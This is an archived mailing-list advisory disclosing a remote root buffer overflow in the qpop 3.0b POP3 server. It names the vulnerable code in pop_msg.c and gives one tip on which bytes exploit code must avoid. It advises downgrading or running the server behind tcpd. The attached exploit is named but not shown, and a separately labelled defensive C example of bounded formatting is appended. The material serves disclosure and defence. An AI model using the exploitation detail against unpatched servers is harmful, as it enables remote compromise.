Greetings,

There is a remote buffer overflow in the qpop 3.0 server code that can lead to remote root compromise. Exploit attached.

Vulnerable versions are all versions of qpop 3.0b, affected operating systems are _all_ systems that run it. Versions 2.52 and 2.53 do not contain this bug. The latest version available is 3.0b20, which is vulnerable, along with all previous 3.0 versions.

I advise everyone running qpop3.0b servers to shut down the server IMMEDIATELY by disabling the entry in inetd.conf and then downgrading to v2.53 or another program until an official patch has been released.

Details:
The buffer overflow(s) are present in pop_msg.c (sounds familiar..) starting at line 68. All configurations and different builds seem to be vulnerable, as either vsprintf or sprintf are used, which both do not check bounds on the input buffers for each argument.

Exploiting:
The overflow code should not contain characters 0x0c/x17/x20, because it would get interpreted as more than one argument and hence fail.

Patching:
I included a small patch. You should only use unofficial patches if you totally need to use version 3.0, otherwise downgrade and wait for a patch from Qualcomm. IF you patch this by yourself, please consider that the buffer pointer CHANGES and the buffer is about 30 bytes LESS than the defined MAXLINELEN!!

PS: The installation file suggests to run qpopper without tcpd, e.g.:

    pop3 stream tcp nowait root /usr/local/lib/qpopper qpopper -s

I would NOT suggest doing it that way. Use:

    pop3 stream tcp nowait root /usr/sbin/tcpd qpopper -s

instead. At least for me it works behind a tcp wrapper, and that way, you can use access control and every connection _attempt_ gets logged.

Mixter
________________________
mixterat_private
members.tripod.com/mixtersecurity

[Attachments: q3smash.c, qp3b20.patch]
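The caveat in the post about the moving buffer pointer, shown as an added example (not code from the original post or from qpopper): a bounded reply formatter whose limit shrinks as the write pointer advances past the prefix. The helper name `build_reply`, the `MAXLINELEN` value of 1024 and the sample strings are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MAXLINELEN 1024  /* assumed value; the post does not state it */

/* Hypothetical helper: builds "<status> <formatted text>\r\n" in out.
 * Returns the reply length, or -1 on a formatting error or when the text
 * had to be cut; in the cut case out still holds a terminated reply. */
static int build_reply(char out[MAXLINELEN], const char *status,
                       const char *format, ...)
{
    va_list ap;
    char *mp = out;                /* write pointer, moves past the prefix */
    size_t left = MAXLINELEN - 3;  /* keep room for "\r\n" and the NUL */
    int n, cut = 0;

    /* The prefix uses up part of the buffer before any argument goes in. */
    n = snprintf(mp, left, "%s ", status);
    if (n < 0 || (size_t)n >= left)
        return -1;
    mp += n;
    left -= (size_t)n;             /* the bound shrinks with the pointer */

    va_start(ap, format);
    n = vsnprintf(mp, left, format, ap);  /* limit is what is left */
    va_end(ap);
    if (n < 0)
        return -1;
    if ((size_t)n >= left) {       /* did not fit: vsnprintf wrote left-1 */
        n = (int)left - 1;
        cut = 1;
    }
    mp += n;
    memcpy(mp, "\r\n", 3);         /* fits: 3 bytes were reserved above */
    return cut ? -1 : (int)(mp + 2 - out);
}

int main(void)
{
    char reply[MAXLINELEN], big[2000];  /* constructed oversized argument */
    int r;
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("%d\n", build_reply(reply, "-ERR", "bad arg: %s", "foo"));
    r = build_reply(reply, "-ERR", "bad arg: %s", big);
    printf("%d %zu\n", r, strlen(reply));
    return 0;
}
```

Passing `MAXLINELEN` itself as the limit after `mp` has advanced would still allow a write past the end of the buffer by the length of the prefix.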
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:15:01 PDT